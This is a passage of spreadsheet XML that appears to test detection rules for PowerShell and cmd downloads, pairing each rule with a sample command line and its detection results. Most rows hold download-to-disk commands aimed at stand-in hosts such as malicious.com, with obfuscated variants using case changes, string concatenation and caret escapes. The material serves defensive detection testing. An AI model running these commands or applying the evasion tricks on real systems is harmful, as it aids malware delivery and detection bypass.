    <row r="206" ht="15.75" customHeight="1" s="42">
      <c r="A206" s="43" t="n"/>
      <c r="B206" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C206" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D206" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E206" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F206" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G206" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H206" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I206" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J206" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K206" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="207" ht="15.75" customHeight="1" s="42">
      <c r="A207" s="43" t="n"/>
      <c r="B207" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C207" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D207" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E207" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F207" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G207" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H207" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I207" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J207" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K207" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="208" ht="15.75" customHeight="1" s="42">
      <c r="A208" s="43" t="n"/>
      <c r="B208" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C208" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D208" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E208" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F208" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G208" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H208" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I208" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J208" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K208" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="209" ht="15.75" customHeight="1" s="42">
      <c r="A209" s="43" t="n"/>
      <c r="B209" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C209" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D209" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E209" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F209" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G209" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H209" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I209" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J209" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K209" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="210" ht="15.75" customHeight="1" s="42">
      <c r="A210" s="43" t="n"/>
      <c r="B210" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C210" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D210" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E210" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnd "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F210" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G210" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H210" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I210" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J210" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K210" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="211" ht="15.75" customHeight="1" s="42">
      <c r="A211" s="43" t="n"/>
      <c r="B211" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C211" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D211" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E211" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnD "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F211" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G211" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H211" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I211" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J211" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K211" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="212" ht="15.75" customHeight="1" s="42">
      <c r="A212" s="43" t="n"/>
      <c r="B212" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C212" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D212" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E212" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F212" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G212" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H212" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I212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12" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K212" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="213" ht="15.75" customHeight="1" s="42">
      <c r="A213" s="43" t="n"/>
      <c r="B213" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C213" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D213" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E213" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F213" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G213" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H213" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I213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13" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K213" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="214" ht="15.75" customHeight="1" s="42">
      <c r="A214" s="43" t="n"/>
      <c r="B214" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C214" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D214" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E214" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F214" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G214" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H214" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I214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14" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K214" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="215" ht="15.75" customHeight="1" s="42">
      <c r="A215" s="43" t="n"/>
      <c r="B215" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C215" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D215" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E215" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F215" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G215" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H215" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I215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15" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K215" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="216" ht="15.75" customHeight="1" s="42">
      <c r="A216" s="43" t="n"/>
      <c r="B216" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C216" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D216" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E216" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F216" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G216" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H216" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I216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16" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K216" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="217" ht="15.75" customHeight="1" s="42">
      <c r="A217" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B217" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C217" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D217" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E217" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F217" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G217" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H217" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I217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17" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K217" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="218" ht="15.75" customHeight="1" s="42">
      <c r="A218" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B218" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C218" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D218" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E218" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F218" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G218" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H218" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I218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18" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K218" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="219" ht="15.75" customHeight="1" s="42">
      <c r="A219" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B219" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C219" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D219" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E219" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F219" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G219" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H219" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I219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19" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K219" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="220" ht="15.75" customHeight="1" s="42">
      <c r="A220" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B220" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C220" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D220" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E220" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl -"o" %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F220" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G220" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H220" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I220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20" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K220" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="221" ht="15.75" customHeight="1" s="42">
      <c r="A221" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B221" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C221" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D221" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E221" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C curl -O %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F221" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G221" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H221" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I221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21" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K221" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="222" ht="15.75" customHeight="1" s="42">
      <c r="A222" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B222" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C222" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D222" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E222" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F222" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G222" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H222" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I222" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J222" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K222" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="223" ht="15.75" customHeight="1" s="42">
      <c r="A223" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B223" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C223" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D223" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E223" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F223" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G223" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H223" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I223" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J223" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K223" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="224" ht="15.75" customHeight="1" s="42">
      <c r="A224" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B224" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C224" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D224" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E224" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl /"o" %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F224" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G224" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H224" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I224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24" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K224" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="225" ht="15.75" customHeight="1" s="42">
      <c r="A225" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B225" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C225" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D225" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E225" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F225" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G225" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H225" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I225" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J225" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K225" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="226" ht="15.75" customHeight="1" s="42">
      <c r="A226" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B226" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C226" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D226" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E226" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F226" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G226" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H226" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I226" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J226" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K226" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="227" ht="15.75" customHeight="1" s="42">
      <c r="A227" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B227" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C227" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D227" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E227" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F227" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G227" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H227" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I227" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J227" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K227" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="228" ht="15.75" customHeight="1" s="42">
      <c r="A228" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B228" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C228" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D228" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E228" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMAnD "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F228" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G228" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H228" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I228" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J228" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K228" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="229" ht="15.75" customHeight="1" s="42">
      <c r="A229" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B229" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C229" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D229" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E229" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F229" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G229" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H229" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I229" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J229" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K229" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="230" ht="15.75" customHeight="1" s="42">
      <c r="A230" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B230" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C230" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D230" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E230" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F230" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G230" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H230" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I230" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
